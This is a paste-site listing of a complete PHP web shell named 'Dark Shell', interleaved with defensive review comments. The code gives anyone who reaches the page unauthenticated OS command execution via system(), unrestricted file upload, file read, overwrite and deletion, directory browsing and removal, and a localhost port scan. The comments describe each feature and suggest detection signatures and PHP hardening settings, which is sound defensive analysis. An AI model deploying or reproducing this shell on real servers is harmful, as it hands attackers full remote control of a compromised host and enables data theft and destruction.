PalmaSolutions

csdamin.php

Jul 2nd, 2018
  1. <html>
  2. <head>
  3. <title>
  4. Dark Shell
  5. </title>
  6. </head>
  7. <body>
  8. <style type="text/css">
  9. body{
  10. background: #E4E4E4;
  11. color: #666666;
  12. font-family: Verdana;
  13. font-size: 11px;
  14. }
  15. a:link{
  16. color: #33CC99;
  17. }
  18. a:visited{
  19. color: #33CC99;
  20. }
  21. a:hover{
  22. text-decoration: none;
  23. Color: #3399FF;
  24. }
  25. table {
  26. font-size: 11px;
  27. }
  28. </style>
  29. <?php
  // REVIEW (defensive annotation): from here down this listing is a PHP web shell.
  // Nothing in the listing checks a password, session or client address before acting on
  // request parameters, so every client that can reach the URL gets the same access.
  // A copy found on a server is evidence of compromise: establish how the file was written
  // (vulnerable upload handler, stolen credentials, ...) rather than only deleting it.
  // Turn off PHP error reporting for this request.
  30. error_reporting (0);
  // Lift the script execution time limit.
  31. set_time_limit (0);
  // Working directory: taken verbatim from the `dir` query parameter, else the script's own cwd.
  32. if (empty ($_GET ['dir'])){
  33. $dir = getcwd ();
  34. }
  35. else {
  36. $dir = $_GET ['dir'];
  37. }
  // Every relative file name used further down resolves against this directory.
  // Hardening note: PHP's open_basedir setting limits which paths file functions may touch.
  38. chdir ($dir);
  // Base URL reused by every generated link and form: PHP_SELF + "?dir=<dir>", HTML-encoded.
  // Detection: requests to one .php file that carry `dir=` together with `mode=` match this script's URL scheme.
  39. $current = htmlentities ($_SERVER ['PHP_SELF'] . "?dir=" . $dir);
  40.  
  // Banner and menu. Prints the "Dark Shell" heading, then discloses the server name, the
  // current directory and the server software string to whoever requests the page.
  // The literal heading (also present in the <title> element) is a usable content signature
  // when scanning web roots or HTTP responses.
  41. echo "<center><h1>Dark Shell</h1></center><p><hr><p>\n";
  42. echo "<i>Server: " . $_SERVER ['SERVER_NAME'] . "<br>\n";
  43. echo "Current directory: " . getcwd () . "<br>\n";
  44. echo "Software: " . $_SERVER ['SERVER_SOFTWARE'] . "<pre>\n\n</pre></i>\n";
  45. echo "<pre>\n\n\n</pre>";
  46.  
  // Menu row: four links that differ only in the `mode` value (system, create, upload, port_scan).
  47. echo "<table width = 50%>";
  48. echo "<tr>";
  49. echo "<td><a href = '".$current."&mode=system'>Shell Command</a></td>\n";
  50. echo "<td><a href = '".$current."&mode=create'>Create a new file</a></td>\n";
  51. echo "<td><a href = '".$current."&mode=upload'>Upload file</a></td>\n";
  52. echo "<td><a href = '".$current."&mode=port_scan'>Port Scan</a></td>\n";
  53. echo "</tr></table>";
  54. echo "<pre>\n\n</pre>";
  55.  
  56.  
  57.  
  // Action dispatcher. The `mode` query parameter selects one of: edit, delete, copy, move,
  // rename, rmdir, system, create, upload, port_scan. Targets arrive in further GET parameters
  // (file, src, old, rm) and payloads in POST fields (new, dst, cmd, port_range, upload_file).
  // Detection: these parameter names appear in the query string and are visible in access logs;
  // POST bodies are typically not logged, so the submitted values usually are not.
  // None of the request values is validated or restricted to a directory before use.
  58. $mode = $_GET ['mode'];
  59. switch ($mode){
  // edit: without POST `new`, reads the file named by `file` and shows it in a textarea;
  // with POST `new`, opens the same file in "w" mode and writes the posted content over it.
  // Impact: read and overwrite of any file the PHP process can access. File-integrity
  // monitoring on the web root is the control that surfaces such changes.
  60. case 'edit':
  61. $file = $_GET ['file'];
  62. $new = $_POST ['new'];
  63. if (empty ($new)){
  64. $fp = fopen ($file, "r");
  65. $file_cont = fread ($fp, filesize ($file));
  // The displayed text is altered here ("</textarea>" becomes "<textarea>"), so what the
  // form shows is not always byte-identical to the file on disk.
  66. $file_cont = str_replace ("</textarea>", "<textarea>", $file_cont);
  67. echo "<form action = '".$current."&mode=edit&file=".$file."' method = 'POST'>\n";
  68. echo "File: ". $file . "<br>\n";
  69. echo "<textarea name = 'new' rows = '30' cols = '50'>".$file_cont."</textarea><br>\n";
  70. echo "<input type = 'submit' value = 'Edit'></form>\n";
  71. }
  72. else {
  73. $fp = fopen ($file, "w");
  74. if (fwrite ($fp, $new)){
  75. echo $file . " edited.<p>";
  76. }
  77. else {
  78. echo "Unable to edit " . $file . ".<p>";
  79. }
  80. }
  81. fclose ($fp);
  82. break;
  // delete: unlink() on the path given in `file`.
  83. case 'delete':
  84. $file = $_GET ['file'];
  85. if (unlink ($file)){
  86. echo $file . " deleted successfully.<p>";
  87. }
  88. else {
  89. echo "Unable to delete " . $file . ".<p>";
  90. }
  91. break;
  // copy: source from GET `src`, destination from POST `dst`; shows a form until `dst` is posted.
  92. case 'copy':
  93. $src = $_GET ['src'];
  94. $dst = $_POST ['dst'];
  95. if (empty ($dst)){
  96. echo "<form action = '".$current . "&mode=copy&src=" . $src . "' method = 'POST'>\n";
  97. echo "Destination: <input name = 'dst'><br>\n";
  98. echo "<input type = 'submit' value = 'Copy'></form>\n";
  99. }
  100. else {
  101. if (copy ($src, $dst)){
  102. echo "File copied successfully.<p>\n";
  103. }
  104. else {
  105. echo "Unable to copy " . $src . ".<p>\n";
  106. }
  107. }
  108. break;
  // move: same request shape as copy, implemented with rename().
  109. case 'move':
  110. $src = $_GET ['src'];
  111. $dst = $_POST ['dst'];
  112. if (empty ($dst)){
  113. echo "<form action = '".$current . "&mode=move&src=" . $src . "' method = 'POST'>\n";
  114. echo "Destination: <input name = 'dst'><br>\n";
  115. echo "<input type = 'submit' value = 'Move'></form>\n";
  116. }
  117. else {
  118. if (rename ($src, $dst)){
  119. echo "File moved successfully.<p>\n";
  120. }
  121. else {
  122. echo "Unable to move " . $src . ".<p>\n";
  123. }
  124. }
  125. break;
  // rename: old name from GET `old`, new name from POST `new`; used for files and directories.
  126. case 'rename':
  127. $old = $_GET ['old'];
  128. $new = $_POST ['new'];
  129. if (empty ($new)){
  130. echo "<form action = '".$current . "&mode=rename&old=" . $old . "' method = 'POST'>\n";
  131. echo "New name: <input name = 'new'><br>\n";
  132. echo "<input type = 'submit' value = 'Rename'></form>\n";
  133. }
  134. else {
  135. if (rename ($old, $new)){
  136. echo "File/Directory renamed successfully.<p>\n";
  137. }
  138. else {
  139. echo "Unable to rename " . $old . ".<p>\n";
  140. }
  141. }
  142. break;
  143.  
  // rmdir: removes the directory named in `rm`.
  144. case 'rmdir':
  145. $rm = $_GET ['rm'];
  146. if (rmdir ($rm)){
  147. echo "Directory removed successfully.<p>\n";
  148. }
  149. else {
  150. echo "Unable to remove " . $rm . ".<p>\n";
  151. }
  152. break;
  // system: the POST field `cmd` is handed unchanged to system(), i.e. OS command execution
  // under whatever account PHP runs as; the output goes straight into the response.
  // Mitigation: list system() and the other process-execution functions in php.ini
  // disable_functions where the application does not need them.
  // Detection: a web server or PHP worker process spawning a shell or other child process.
  153. case 'system':
  154. $cmd = $_POST ['cmd'];
  155. if (empty ($cmd)){
  156. echo "<form action = '".$current . "&mode=system' method = 'POST'>\n";
  157. echo "Shell Command: <input name = 'cmd'>\n";
  158. echo "<input type = 'submit' value = 'Run'></form><p>\n";
  159. }
  160. else {
  161. system ($cmd);
  162. }
  163. break;
  // create: opens the path from POST `new` in "w" mode, which creates the file or
  // truncates an existing one to zero length.
  164. case 'create':
  165. $new = $_POST ['new'];
  166. if (empty ($new)){
  167. echo "<form action = '".$current . "&mode=create' method = 'POST'>\n";
  168. echo "<tr><td>New file: <input name = 'new'></td>\n";
  169. echo "<td><input type = 'submit' value = 'Create'></td></tr></form>\n<p>";
  170. }
  171. else {
  172. if ($fp = fopen ($new, "w")){
  173. echo "File created successfully.<p>\n";
  174. }
  175. else {
  176. echo "Unable to create ".$file.".<p>\n";
  177. }
  178. fclose ($fp);
  179. }
  180. break;
  // upload: multipart field `upload_file` is moved into the current working directory under
  // the basename the client supplied; no extension or content check is applied.
  // Detection: new script files appearing in directories the web server can write to.
  // Hardening: keep web-writable directories non-executable for PHP.
  181. case 'upload':
  182. $temp = $_FILES['upload_file']['tmp_name'];
  183. $file = basename($_FILES['upload_file']['name']);
  184. if (empty ($file)){
  185. echo "<form action = '".$current . "&mode=upload' method = 'POST' ENCTYPE='multipart/form-data'>\n";
  186. echo "Local file: <input type = 'file' name = 'upload_file'>\n";
  187. echo "<input type = 'submit' value = 'Upload'>\n";
  188. echo "</form>\n<pre>\n\n</pre>";
  189. }
  190. else {
  191. if(move_uploaded_file($temp,$file)){
  192. echo "File uploaded successfully.<p>\n";
  193. unlink ($temp);
  194. }
  195. else {
  196. echo "Unable to upload " . $file . ".<p>\n";
  197. }
  198. }
  199. break;
  200.  
  // port_scan: POST `port_range` is split on ":" into a start and end port; both must be
  // numeric. Each port in the range gets one fsockopen() attempt and is printed when the
  // connection succeeds. The host is hard-coded to 'localhost', so this enumerates services
  // listening on the compromised machine itself, not on remote hosts.
  // Detection: a burst of sequential loopback connection attempts originating from a PHP worker.
  201. case 'port_scan':
  202. $port_range = $_POST ['port_range'];
  203. if (empty ($port_range)){
  204. echo "<table><form action = '".$current. "&mode=port_scan' method = 'POST'>";
  205. echo "<tr><td><input type = 'text' name = 'port_range'></td><td>";
  206. echo "Enter port range where you want to do port scan (ex.: 0:65535)</td></tr>";
  207. echo "<tr><td><input type = 'submit' value = 'Port Scan'></td></tr></form></table>";
  208. }
  209. else {
  210. $range = explode (":", $port_range);
  211. if ((!is_numeric ($range [0])) or (!is_numeric ($range [1]))){
  212. echo "Bad parameters.<br>";
  213. }
  214. else {
  215. $host = 'localhost';
  216. $from = $range [0];
  217. $to = $range [1];
  218. echo "Open ports:<br>";
  219. while ($from <= $to){
  220. $var = 0;
  221. $fp = fsockopen ($host, $from) or $var = 1;
  222. if ($var == 0){
  223. echo $from . "<br>";
  224. }
  225. $from++;
  226. fclose ($fp);
  227. }
  228. }
  229. }
  230. break;
  231.  
  232.  
  233. }
  234.  
  // Directory listing, rendered on every request after the selected action has run.
  // Drop PHP's cached stat results so sizes and types reflect any change just made.
  235. clearstatcache ();
  236.  
  237. echo "<pre>\n\n</pre>";
  238. echo "<table width = 100%>\n";
  // Enumerate the directory chosen through the `dir` parameter.
  239. $files = scandir ($dir);
  240. foreach ($files as $file){
  // Regular files: name, size in KB, and one link per file action.
  // Entry names are written into the HTML without escaping.
  241. if (is_file ($file)){
  242.  
  243. $size = round (filesize ($file) / 1024, 2);
  244. echo "<tr><td>".$file."</td>";
  245. echo "<td>".$size." KB</td>";
  246. echo "<td><a href = ".$current . "&mode=edit&file=".$file.">Edit</a></td>\n";
  247. echo "<td><a href = ".$current . "&mode=delete&file=".$file.">Delete</a></td>\n";
  248. echo "<td><a href = ".$current . "&mode=copy&src=".$file.">Copy</a></td>\n";
  249. echo "<td><a href = ".$current . "&mode=move&src=".$file.">Move</a></td>\n";
  // The link text on the next line is misspelled ("Remame") and is emitted verbatim, which
  // makes it a low-noise string for content signatures.
  250. echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Remame</a></td></tr>\n";
  251. }
  // Everything else is treated as a directory: item count (scandir count minus 2), a link
  // that appends "/<name>" to the current `dir` value, and the rmdir/rename actions.
  252. else {
  253. $items = scandir ($file);
  254. $items_num = count ($items) - 2;
  255. echo "<tr><td>".$file."</td>";
  256. echo "<td>".$items_num." Items</td>";
  257. echo "<td><a href = ".$current . "/" . $file.">Change directory</a></td>\n";
  258. echo "<td><a href = ".$current . "&mode=rmdir&rm=".$file.">Remove directory</a></td>\n";
  259. echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Rename directory</a></td></tr>\n";
  260. }
  261. }
  262. echo "</table>\n";
  263. ?>